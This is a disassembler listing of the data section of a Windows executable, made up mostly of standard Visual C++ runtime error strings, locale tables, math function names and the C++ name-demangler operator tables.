; ---------------------------------------------------------------------------
sub ecx, ebx
inc ecx
add [eax-35h], cl
inc ecx
add [ebp-35h], ah
inc ecx
add [ecx-62FFBE35h], al
retf
; ---------------------------------------------------------------------------
inc ecx
add [ecx-2AFFBE35h], bh
retf
; ---------------------------------------------------------------------------
inc ecx
add cl, dh
retf
; ---------------------------------------------------------------------------
dw 41h
dd offset loc_41CC0D
dd offset loc_41CC29
dd offset loc_41CC45
dd offset loc_41CC61
dd offset loc_41CC7D
dd offset loc_41CC8B
dd offset loc_41CCA7
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 2
dw 41h
dword_41D2CC dd 0 ; DATA XREF: sub_407D29+50o
dword_41D2D0 dd 0 ; DATA XREF: sub_407D29+2Do
dd offset sub_403182
dd offset sub_4051B3
dd offset sub_40843A
dd offset sub_40ACDF
dd offset sub_40FBEA
dd offset sub_40B539
dword_41D2EC dd 0 ; DATA XREF: sub_407D29+28o
dword_41D2F0 dd 0 ; DATA XREF: sub_407DBB+73o
dd offset sub_4117FA
dd offset sub_4084EB
dword_41D2FC dd 0 ; DATA XREF: sub_407DBB:loc_407E29o
dword_41D300 dd 0 ; DATA XREF: sub_407DBB+83o
dd offset sub_40B55A
dword_41D308 dd 2 dup(0) ; DATA XREF: sub_407DBB:loc_407E39o
dword_41D310 dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh, 42111Ch
; DATA XREF: .data:00423000o
; .data:00423004o ...
off_41D324 dd offset loc_401043 ; DATA XREF: sub_401038o
; .text:00401046o ...
dd offset sub_4030AC
dd offset dword_4210D0
off_41D330 dd offset loc_4010C5 ; DATA XREF: sub_401065+20o
; sub_40109A+Ao ...
dd offset sub_4010B7
dd offset dword_421080
off_41D33C dd offset loc_4010EC ; DATA XREF: .text:loc_4010E1o
; .text:004010EFo ...
dd offset sub_4010B7
dd offset dword_420F40
off_41D348 dd offset loc_402A24 ; DATA XREF: sub_402A19o
; .text:00402A27o ...
dd offset sub_4010B7
aStringTooLong db 'string too long',0 ; DATA XREF: sub_402A46+Co
aInvalidStringP db 'invalid string position',0 ; DATA XREF: sub_402A85+Co
dd offset dword_420F90
off_41D37C dd offset loc_4030B9 ; DATA XREF: sub_402FC7+Ao
; sub_402FD8+9o ...
dd offset sub_4030AC
aUnknownExcepti db 'Unknown exception',0 ; DATA XREF: sub_4030AC+7o
align 4
dd offset dword_420FA4
off_41D39C dd offset loc_4033C7 ; DATA XREF: sub_4033B9+1o
; .data:off_423008o ...
oword_41D3A0 xmmword 3FF00000000000003FF0000000000000h ; DATA XREF: sub_404170+E3r
; sub_404170+10Ar
oword_41D3B0 xmmword 4330000000000000433h ; DATA XREF: sub_404170+46r
oword_41D3C0 xmmword 0 ; DATA XREF: sub_404170:loc_404271r
oword_41D3D0 xmmword 7FFh ; DATA XREF: sub_404170+5Fr
dbl_41D3E0 db 0, 0, 0, 0, 0, 0, 0, 80h ; DATA XREF: sub_404170:loc_40426Ar
dword_41D3E8 dd 0E06D7363h, 1, 2 dup(0) ; DATA XREF: sub_40456B+Eo
dd 3, 19930520h, 2 dup(0)
off_41D408 dd offset dword_427600 ; DATA XREF: sub_404A3E+D4o
dd offset dword_427658
dd 4030201h, 8070605h, 0C0B0A09h, 100F0E0Dh, 14131211h
dd 18171615h, 1C1B1A19h, 201F1E1Dh, 24232221h, 28272625h
dd 2C2B2A29h, 302F2E2Dh, 34333231h, 38373635h, 3C3B3A39h
dd 403F3E3Dh, 44434241h, 48474645h, 4C4B4A49h, 504F4E4Dh
dd 54535251h, 58575655h, 5C5B5A59h, 605F5E5Dh, 64636261h
dd 68676665h, 6C6B6A69h, 706F6E6Dh, 74737271h, 78777675h
dd 7C7B7A79h, 7F7E7Dh
db 3Dh, 0
word_41D492 dw 0 ; DATA XREF: sub_40AF33+1Bo
; fabskl8p:0041EB80o ...
aEncodepointer db 'EncodePointer',0 ; DATA XREF: sub_4054D7+43o
; sub_405616+2Eo
align 4
aKernel32_dll db 'KERNEL32.DLL',0 ; DATA XREF: sub_4054D7:loc_40550Bo
; sub_405543:loc_405577o ...
align 4
aDecodepointer db 'DecodePointer',0 ; DATA XREF: sub_405543+43o
; sub_405616+42o
align 4
aFlsfree db 'FlsFree',0 ; DATA XREF: sub_405886+44o
aFlssetvalue db 'FlsSetValue',0 ; DATA XREF: sub_405886+37o
aFlsgetvalue db 'FlsGetValue',0 ; DATA XREF: sub_405886+2Ao
dword_41D4E4 dd 41736C46h ; DATA XREF: sub_405886+22o
byte_41D4E8 db 6Ch ; DATA XREF: sub_406D87+177r
db 6Ch, 6Fh, 63h
align 10h
aNull: ; DATA XREF: .data:off_423928o
unicode 0, <(null)>,0
align 10h
aNull_0 db '(null)',0 ; DATA XREF: .data:off_423924o
align 4
byte_41D508 db 6 ; DATA XREF: sub_406D87:loc_406F10r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38202800h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
dd 60686008h, 606060h, 78707800h, 8787878h, 807h, 8080007h
dd 8000008h, 7000800h, 8
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: sub_407C31+Fo
align 4
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: sub_407C31o
aCcs db 'ccs=',0 ; DATA XREF: sub_4085AF+1CCo
align 4
aUtf8 db 'UTF-8',0 ; DATA XREF: sub_4085AF+1E0o
align 10h
aUtf16le db 'UTF-16LE',0 ; DATA XREF: sub_4085AF:loc_4087ACo
align 4
aUnicode db 'UNICODE',0 ; DATA XREF: sub_4085AF:loc_4087C9o
aRuntimeError db 'runtime error ',0
align 4
db 0Dh,0Ah,0
align 4
aTlossError db 'TLOSS error',0Dh,0Ah,0
align 4
aSingError db 'SING error',0Dh,0Ah,0
align 4
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 4
aR6034AnApplica db 'R6034',0Dh,0Ah
db 'An application has made an attempt to load the C runtime library '
db 'incorrectly.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 8
aR6033AttemptTo db 'R6033',0Dh,0Ah
db '- Attempt to use MSIL code from this assembly during native code '
db 'initialization',0Ah
db 'This indicates a bug in your application. It is most likely the r'
db 'esult of calling an MSIL-compiled (/clr) function from a native c'
db 'onstructor or from DllMain.',0Dh,0Ah,0
align 10h
aR6032NotEnough db 'R6032',0Dh,0Ah
db '- not enough space for locale information',0Dh,0Ah,0
align 8
aR6031AttemptTo db 'R6031',0Dh,0Ah
db '- Attempt to initialize the CRT more than once.',0Ah
db 'This indicates a bug in your application.',0Dh,0Ah,0
align 4
aR6030CrtNotIni db 'R6030',0Dh,0Ah
db '- CRT not initialized',0Dh,0Ah,0
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 10h
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_423C04o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_409E64+157o
align 10h
asc_41DB20 db 0Ah ; DATA XREF: sub_409E64:loc_409F74o
db 0Ah,0
align 4
a___ db '...',0 ; DATA XREF: sub_409E64+E8o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_409E64+A3o
align 10h
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_409E64+5Bo
db 0Ah
db 'Program: ',0
align 4
dd 2 dup(0)
dd 7FF00000h, 0
dd 0FFF00000h, 0
dd 7FE00000h, 0
dd 200000h, 3 dup(0)
dd 80000000h, 7F800000h, 0FF800000h, 7FC00000h, 0FFC00000h
dd 0
dd 80000000h, 7149F2CAh, 0F149F2CAh, 0DA24260h, 8DA24260h
dd 0C2F8F359h, 1A56E1Fh, 0C2F8F359h, 81A56E1Fh
dword_41DBC8 dd 6E6174h ; DATA XREF: sub_40AA2F:loc_40AC67o
dword_41DBCC dd 736F63h ; DATA XREF: sub_40AA2F:loc_40AC5Eo
dword_41DBD0 dd 6E6973h ; DATA XREF: sub_40AA2F:loc_40AC55o
aModf db 'modf',0 ; DATA XREF: sub_40AA2F:loc_40AC49o
align 4
aFloor db 'floor',0 ; DATA XREF: sub_40AA2F:loc_40AC3Do
align 4
aCeil db 'ceil',0 ; DATA XREF: sub_40AA2F:loc_40AC34o
align 4
aAtan db 'atan',0 ; DATA XREF: sub_40AA2F:loc_40AC2Bo
align 4
aExp10 db 'exp10',0 ; DATA XREF: sub_40AA2F+1BFo
align 10h
dbl_41DC00 dq 1.0 ; DATA XREF: sub_40ACF3+6Dr
aAcos db 'acos',0 ; DATA XREF: sub_40AA2F:loc_40ABB2o
align 10h
aAsin db 'asin',0 ; DATA XREF: sub_40AA2F:loc_40ABA9o
align 4
aLog db 'log',0 ; DATA XREF: sub_40AA2F:loc_40AB6Co
; sub_40AA2F+149o ...
aLog10 db 'log10',0 ; DATA XREF: sub_40AA2F:loc_40AB45o
; sub_40AA2F+131o ...
align 4
aExp db 'exp',0 ; DATA XREF: sub_40AA2F:loc_40AB0Co
; sub_40AA2F+10Do ...
aPow db 'pow',0 ; DATA XREF: sub_40AA2F:loc_40AAD7o
; sub_40AA2F:loc_40AB84o ...
off_41DC2C dd offset sub_40B771 ; DATA XREF: sub_4069F0+F1r
; sub_4069F0+FAo ...
dd offset dword_420FEC
off_41DC34 dd offset loc_40B589 ; DATA XREF: sub_40B57Eo
; .text:0040B58Co ...
dd offset sub_4030AC
dword_41DC3C dd 20646162h, 65637865h, 6F697470h, 6Eh ; DATA XREF: sub_40BDB6+156o
dword_41DC4C dd 41h dup(0) ; DATA XREF: sub_40C307+25o
; sub_40C6EC+27o
asc_41DD50: ; DATA XREF: .data:off_423668o
; .data:00423E70o
unicode 0, < ((((( H>
dw 10h
dd 7 dup(100010h), 5 dup(840084h), 3 dup(100010h), 810010h
dd 2 dup(810081h), 10081h, 9 dup(10001h), 100001h, 2 dup(100010h)
dd 820010h, 2 dup(820082h), 20082h, 9 dup(20002h), 100002h
dd 100010h, 200010h, 40h dup(0)
dword_41DF50 dd 200000h, 4 dup(200020h), 280068h, 280028h, 200028h
; DATA XREF: .data:00423E74o
; .data:00423590o
dd 8 dup(200020h), 480020h, 7 dup(100010h), 840010h, 4 dup(840084h)
dd 100084h, 3 dup(100010h), 3 dup(1810181h), 0Ah dup(1010101h)
dd 3 dup(100010h), 3 dup(1820182h), 0Ah dup(1020102h)
dd 2 dup(100010h), 10h dup(200020h), 480020h, 8 dup(100010h)
dd 140010h, 100014h, 2 dup(100010h), 100014h, 2 dup(100010h)
dd 1010010h, 0Bh dup(1010101h), 1010010h, 3 dup(1010101h)
dd 0Ch dup(1020102h), 1020010h, 3 dup(1020102h), 1010102h
dd 0
dword_41E158 dd 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h
dd 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h
dd 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h
dd 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh
dd 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h
dd 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h
dd 0FBFAF9F8h, 0FFFEFDFCh, 3020100h, 7060504h, 0B0A0908h
dd 0F0E0D0Ch, 13121110h, 17161514h, 1B1A1918h, 1F1E1D1Ch
dd 23222120h, 27262524h, 2B2A2928h, 2F2E2D2Ch, 33323130h
dd 37363534h, 3B3A3938h, 3F3E3D3Ch, 63626140h, 67666564h
dd 6B6A6968h, 6F6E6D6Ch, 73727170h, 77767574h, 5B7A7978h
dd 5F5E5D5Ch, 63626160h, 67666564h, 6B6A6968h, 6F6E6D6Ch
dd 73727170h, 77767574h, 7B7A7978h, 7F7E7D7Ch, 83828180h
dd 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h, 97969594h
dd 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h, 0ABAAA9A8h
dd 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h, 0BFBEBDBCh
dd 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h
dd 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h, 0E7E6E5E4h
dd 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h, 0FBFAF9F8h
dd 0FFFEFDFCh, 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch
dd 93929190h, 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h
dd 0A7A6A5A4h, 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h
dd 0BBBAB9B8h, 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h
dd 0CFCECDCCh, 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F7F6F5F4h, 0FBFAF9F8h, 0FFFEFDFCh, 3020100h, 7060504h
dd 0B0A0908h, 0F0E0D0Ch, 13121110h, 17161514h, 1B1A1918h
dd 1F1E1D1Ch, 23222120h, 27262524h, 2B2A2928h, 2F2E2D2Ch
dd 33323130h, 37363534h, 3B3A3938h, 3F3E3D3Ch, 43424140h
dd 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h, 57565554h
dd 5B5A5958h, 5F5E5D5Ch, 43424160h, 47464544h, 4B4A4948h
dd 4F4E4D4Ch, 53525150h, 57565554h, 7B5A5958h, 7F7E7D7Ch
dd 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h
dd 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h
dd 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h
dd 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh
dd 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h
dd 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h
dd 0FBFAF9F8h, 0FFFEFDFCh, 6D3A4848h, 73733A6Dh, 0
aDdddMmmmDdYyyy db 'dddd, MMMM dd, yyyy',0 ; DATA XREF: .data:00423F1Co
aMmDdYy db 'MM/dd/yy',0 ; DATA XREF: .data:00423F18o
align 4
aPm db 'PM',0 ; DATA XREF: .data:00423F14o
align 4
aAm db 'AM',0 ; DATA XREF: .data:00423F10o
align 4
aDecember db 'December',0 ; DATA XREF: .data:00423F0Co
align 4
aNovember db 'November',0 ; DATA XREF: .data:00423F08o
align 4
aOctober db 'October',0 ; DATA XREF: .data:00423F04o
aSeptember db 'September',0 ; DATA XREF: .data:00423F00o
align 4
aAugust db 'August',0 ; DATA XREF: .data:00423EFCo
align 10h
aJuly db 'July',0 ; DATA XREF: .data:00423EF8o
align 4
aJune db 'June',0 ; DATA XREF: .data:00423EF4o
align 10h
aApril db 'April',0 ; DATA XREF: .data:00423EECo
align 4
aMarch db 'March',0 ; DATA XREF: .data:00423EE8o
align 10h
aFebruary db 'February',0 ; DATA XREF: .data:00423EE4o
align 4
aJanuary db 'January',0 ; DATA XREF: .data:00423EE0o
aDec db 'Dec',0 ; DATA XREF: .data:00423EDCo
aNov db 'Nov',0 ; DATA XREF: .data:00423ED8o
aOct db 'Oct',0 ; DATA XREF: .data:00423ED4o
aSep db 'Sep',0 ; DATA XREF: .data:00423ED0o
aAug db 'Aug',0 ; DATA XREF: .data:00423ECCo
aJul db 'Jul',0 ; DATA XREF: .data:00423EC8o
aJun db 'Jun',0 ; DATA XREF: .data:00423EC4o
aMay db 'May',0 ; DATA XREF: .data:00423EC0o
; .data:00423EF0o
aApr db 'Apr',0 ; DATA XREF: .data:00423EBCo
aMar db 'Mar',0 ; DATA XREF: .data:00423EB8o
aFeb db 'Feb',0 ; DATA XREF: .data:00423EB4o
aJan db 'Jan',0 ; DATA XREF: .data:00423EB0o
aSaturday db 'Saturday',0 ; DATA XREF: .data:00423EACo
align 10h
aFriday db 'Friday',0 ; DATA XREF: .data:00423EA8o
align 4
aThursday db 'Thursday',0 ; DATA XREF: .data:00423EA4o
align 4
aWednesday db 'Wednesday',0 ; DATA XREF: .data:00423EA0o
align 10h
aTuesday db 'Tuesday',0 ; DATA XREF: .data:00423E9Co
aMonday db 'Monday',0 ; DATA XREF: .data:00423E98o
align 10h
aSunday db 'Sunday',0 ; DATA XREF: .data:00423E94o
align 4
aSat db 'Sat',0 ; DATA XREF: .data:00423E90o
aFri db 'Fri',0 ; DATA XREF: .data:00423E8Co
aThu db 'Thu',0 ; DATA XREF: .data:00423E88o
aWed db 'Wed',0 ; DATA XREF: .data:00423E84o
aTue db 'Tue',0 ; DATA XREF: .data:00423E80o
aMon db 'Mon',0 ; DATA XREF: .data:00423E7Co
aSun db 'Sun',0 ; DATA XREF: .data:off_423E78o
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0 ; DATA XREF: sub_40CEC4+53o
align 4
aKernel32_dl_10 db 'kernel32.dll',0 ; DATA XREF: sub_40CEC4+44o
align 4
aCompleteObject db ' Complete Object Locator',27h,0 ; DATA XREF: fabskl8p:0041EB94o
align 4
aClassHierarchy db ' Class Hierarchy Descriptor',27h,0 ; DATA XREF: fabskl8p:0041EB90o
align 4
aBaseClassArray db ' Base Class Array',27h,0 ; DATA XREF: fabskl8p:0041EB8Co
align 4
aBaseClassDescr db ' Base Class Descriptor at (',0 ; DATA XREF: fabskl8p:0041EB88o
aTypeDescriptor db ' Type Descriptor',27h,0 ; DATA XREF: fabskl8p:0041EB84o
align 4
aLocalStaticThr db '`local static thread guard',27h,0 ; DATA XREF: fabskl8p:0041ECD0o
aManagedVectorC db '`managed vector copy constructor iterator',27h,0
; DATA XREF: fabskl8p:0041ECCCo
align 4
aVectorVbaseCop db '`vector vbase copy constructor iterator',27h,0
; DATA XREF: fabskl8p:0041ECC8o
align 10h
aVectorCopyCons db '`vector copy constructor iterator',27h,0 ; DATA XREF: fabskl8p:0041ECC4o
align 4
aDynamicAtexitD db '`dynamic atexit destructor for ',27h,0 ; DATA XREF: fabskl8p:0041ECC0o
align 4
aDynamicInitial db '`dynamic initializer for ',27h,0 ; DATA XREF: fabskl8p:0041ECBCo
align 4
aEhVectorVbaseC db '`eh vector vbase copy constructor iterator',27h,0
; DATA XREF: fabskl8p:0041ECB8o
aEhVectorCopyCo db '`eh vector copy constructor iterator',27h,0
; DATA XREF: fabskl8p:0041ECB4o
align 4
aManagedVectorD db '`managed vector destructor iterator',27h,0
; DATA XREF: fabskl8p:0041ECB0o
align 10h
aManagedVecto_0 db '`managed vector constructor iterator',27h,0
; DATA XREF: fabskl8p:0041ECACo
align 4
aPlacementDelet db '`placement delete[] closure',27h,0 ; DATA XREF: fabskl8p:0041ECA8o
align 4
aPlacementDel_0 db '`placement delete closure',27h,0 ; DATA XREF: fabskl8p:0041ECA4o
align 4
aOmniCallsig db '`omni callsig',27h,0 ; DATA XREF: fabskl8p:0041ECA0o
align 4
aDelete db ' delete[]',0 ; DATA XREF: fabskl8p:0041EC9Co
align 10h
aNew db ' new[]',0 ; DATA XREF: fabskl8p:0041EC98o
align 4
aLocalVftableCo db '`local vftable constructor closure',27h,0
; DATA XREF: fabskl8p:0041EC94o
aLocalVftable db '`local vftable',27h,0 ; DATA XREF: fabskl8p:0041EC90o
aRtti db '`RTTI',0 ; DATA XREF: fabskl8p:0041EC8Co
align 4
off_41E854 dd offset dword_484560 ; DATA XREF: fabskl8p:0041EC88o
aUdtReturning db '`udt returning',27h,0 ; DATA XREF: fabskl8p:0041EC84o
aCopyConstructo db '`copy constructor closure',27h,0 ; DATA XREF: fabskl8p:0041EC80o
align 4
aEhVectorVbas_0 db '`eh vector vbase constructor iterator',27h,0
; DATA XREF: fabskl8p:0041EC7Co
align 4
aEhVectorDestru db '`eh vector destructor iterator',27h,0 ; DATA XREF: fabskl8p:0041EC78o
aEhVectorConstr db '`eh vector constructor iterator',27h,0 ; DATA XREF: fabskl8p:0041EC74o
align 10h
aVirtualDisplac db '`virtual displacement map',27h,0 ; DATA XREF: fabskl8p:0041EC70o
align 4
aVectorVbaseCon db '`vector vbase constructor iterator',27h,0
; DATA XREF: fabskl8p:0041EC6Co
aVectorDestruct db '`vector destructor iterator',27h,0 ; DATA XREF: fabskl8p:0041EC68o
align 10h
aVectorConstruc db '`vector constructor iterator',27h,0 ; DATA XREF: fabskl8p:0041EC64o
align 10h
aScalarDeleting db '`scalar deleting destructor',27h,0 ; DATA XREF: fabskl8p:0041EC60o
align 10h
aDefaultConstru db '`default constructor closure',27h,0 ; DATA XREF: fabskl8p:0041EC5Co
align 10h
aVectorDeleting db '`vector deleting destructor',27h,0 ; DATA XREF: fabskl8p:0041EC58o
align 10h
aVbaseDestructo db '`vbase destructor',27h,0 ; DATA XREF: fabskl8p:0041EC54o
align 4
aString db '`string',27h,0 ; DATA XREF: fabskl8p:0041EC50o
align 10h
aLocalStaticGua db '`local static guard',27h,0 ; DATA XREF: fabskl8p:0041EC4Co
align 4
aTypeof db '`typeof',27h,0 ; DATA XREF: fabskl8p:0041EC48o
align 4
aVcall db '`vcall',27h,0 ; DATA XREF: fabskl8p:0041EC44o
aVbtable db '`vbtable',27h,0 ; DATA XREF: fabskl8p:0041EC40o
align 4
aVftable db '`vftable',27h,0 ; DATA XREF: fabskl8p:0041EC3Co
align 4
asc_41EA34 db '^=',0 ; DATA XREF: fabskl8p:0041EC38o
align 4
asc_41EA38 db '|=',0 ; DATA XREF: fabskl8p:0041EC34o
align 4
asc_41EA3C db '&=',0 ; DATA XREF: fabskl8p:0041EC30o
align 10h
asc_41EA40 db '<<=',0 ; DATA XREF: fabskl8p:0041EC2Co
asc_41EA44 db '>>=',0 ; DATA XREF: fabskl8p:0041EC28o
asc_41EA48 db '%=',0 ; DATA XREF: fabskl8p:0041EC24o
align 4
asc_41EA4C db '/=',0 ; DATA XREF: fabskl8p:0041EC20o
align 10h
asc_41EA50 db '-=',0 ; DATA XREF: fabskl8p:0041EC1Co
align 4
asc_41EA54 db '+=',0 ; DATA XREF: fabskl8p:0041EC18o
align 4
asc_41EA58 db '*=',0 ; DATA XREF: fabskl8p:0041EC14o
align 4
asc_41EA5C db '||',0 ; DATA XREF: fabskl8p:0041EC10o
align 10h
asc_41EA60 db '&&',0 ; DATA XREF: fabskl8p:0041EC0Co
align 4
asc_41EA64: ; DATA XREF: fabskl8p:0041EC08o
unicode 0, <|>,0
asc_41EA68: ; DATA XREF: fabskl8p:0041EC04o
unicode 0, <^>,0
asc_41EA6C: ; DATA XREF: fabskl8p:0041EC00o
unicode 0, <~>,0
asc_41EA70 db '()',0 ; DATA XREF: fabskl8p:0041EBFCo
align 4
asc_41EA74: ; DATA XREF: fabskl8p:0041EBF8o
unicode 0, <,>,0
asc_41EA78 db '>=',0 ; DATA XREF: fabskl8p:0041EBF4o
align 4
asc_41EA7C: ; DATA XREF: fabskl8p:0041EBF0o
dw 3Eh
unicode 0, <>,0
asc_41EA80 db '<=',0 ; DATA XREF: fabskl8p:0041EBECo
align 4
asc_41EA84: ; DATA XREF: fabskl8p:0041EBE8o
dw 3Ch
unicode 0, <>,0
asc_41EA88: ; DATA XREF: fabskl8p:0041EBE4o
unicode 0, <%>,0
asc_41EA8C: ; DATA XREF: fabskl8p:0041EBE0o
unicode 0, </>,0
asc_41EA90 db '->*',0 ; DATA XREF: fabskl8p:0041EBDCo
asc_41EA94: ; DATA XREF: fabskl8p:0041EBD8o
unicode 0, <&>,0
asc_41EA98: ; DATA XREF: fabskl8p:0041EBD4o
unicode 0, <+>,0
asc_41EA9C: ; DATA XREF: fabskl8p:0041EBD0o
unicode 0, <->,0
asc_41EAA0 db '--',0 ; DATA XREF: fabskl8p:0041EBCCo
align 4
asc_41EAA4 db '++',0 ; DATA XREF: fabskl8p:0041EBC8o
align 4
asc_41EAA8: ; DATA XREF: fabskl8p:0041EBC4o
unicode 0, <*>,0
asc_41EAAC db '->',0 ; DATA XREF: fabskl8p:0041EBC0o
align 10h
aOperator db 'operator',0 ; DATA XREF: fabskl8p:0041EBBCo
align 4
asc_41EABC db '[]',0 ; DATA XREF: fabskl8p:0041EBB8o
align 10h
asc_41EAC0 db '!=',0 ; DATA XREF: fabskl8p:0041EBB4o
align 4
asc_41EAC4 db '==',0 ; DATA XREF: fabskl8p:off_41EBB0o
align 4
asc_41EAC8: ; DATA XREF: fabskl8p:0041EBACo
unicode 0, <!>,0
db '<<',0
align 10h
db '>>',0
align 4
aDelete_0 db ' delete',0
aNew_0 db ' new',0 ; DATA XREF: fabskl8p:0041EB98o
align 4
a__unaligned db '__unaligned',0 ; DATA XREF: fabskl8p:0041EB7Co
a__restrict db '__restrict',0 ; DATA XREF: fabskl8p:0041EB78o
align 4
; a__ptr64
a__ptr64 db '__ptr64',0 ; DATA XREF: fabskl8p:0041EB74o
a__clrcall db '__clrcall',0 ; DATA XREF: fabskl8p:0041EB70o
align 10h
a__fastcall db '__fastcall',0
align 4
a__thiscall db '__thiscall',0
align 4
a__stdcall db '__stdcall',0
align 4
a__pascal db '__pascal',0 ; DATA XREF: fabskl8p:0041EB60o
align 10h
a__cdecl db '__cdecl',0 ; DATA XREF: fabskl8p:0041EB5Co
a__based db '__based(',0
align 8
dec eax
jmp short loc_41EB9C
; ---------------------------------------------------------------------------
align 4
dd offset a__cdecl ; "__cdecl"
dd offset a__pascal ; "__pascal"
; ---------------------------------------------------------------------------
sub bl, ch
inc ecx
add [ebx+ebp*8], bl
inc ecx
add [eax], dl
jmp short near ptr off_41EBB0
; ---------------------------------------------------------------------------
align 10h
dd offset a__clrcall ; "__clrcall"
dd offset a__ptr64 ; "__ptr64"
dd offset a__restrict ; "__restrict"
dd offset a__unaligned ; "__unaligned"
dd offset word_41D492
dd offset aTypeDescriptor ; " Type Descriptor'"
dd offset aBaseClassDescr ; " Base Class Descriptor at ("
dd offset aBaseClassArray ; " Base Class Array'"
dd offset aClassHierarchy ; " Class Hierarchy Descriptor'"
dd offset aCompleteObject ; " Complete Object Locator'"
dd offset aNew_0 ; " new"
; ---------------------------------------------------------------------------
loc_41EB9C: ; CODE XREF: fabskl8p:0041EB59j
aam 0EAh
inc ecx
add [eax-2FFFBE2Ch], dl
jmp far ptr 41h:0EACC0041h
; ---------------------------------------------------------------------------
dd offset asc_41EAC8 ; "!"
off_41EBB0 dd offset asc_41EAC4 ; CODE XREF: fabskl8p:0041EB6Dj
; "=="
dd offset asc_41EAC0 ; "!="
dd offset asc_41EABC ; "[]"
dd offset aOperator ; "operator"
dd offset asc_41EAAC ; "->"
dd offset asc_41EAA8 ; "*"
dd offset asc_41EAA4 ; "++"
dd offset asc_41EAA0 ; "--"
dd offset asc_41EA9C ; "-"
dd offset asc_41EA98 ; "+"
dd offset asc_41EA94 ; "&"
dd offset asc_41EA90 ; "->*"
dd offset asc_41EA8C ; "/"
dd offset asc_41EA88 ; "%"
dd offset asc_41EA84 ; "<"
dd offset asc_41EA80 ; "<="
dd offset asc_41EA7C ; ">"
dd offset asc_41EA78 ; ">="
dd offset asc_41EA74 ; ","
dd offset asc_41EA70 ; "()"
dd offset asc_41EA6C ; "~"
dd offset asc_41EA68 ; "^"
dd offset asc_41EA64 ; "|"
dd offset asc_41EA60 ; "&&"
dd offset asc_41EA5C ; "||"
dd offset asc_41EA58 ; "*="
dd offset asc_41EA54 ; "+="
dd offset asc_41EA50 ; "-="
dd offset asc_41EA4C ; "/="
dd offset asc_41EA48 ; "%="
dd offset asc_41EA44 ; ">>="
dd offset asc_41EA40 ; "<<="
dd offset asc_41EA3C ; "&="
dd offset asc_41EA38 ; "|="
dd offset asc_41EA34 ; "^="
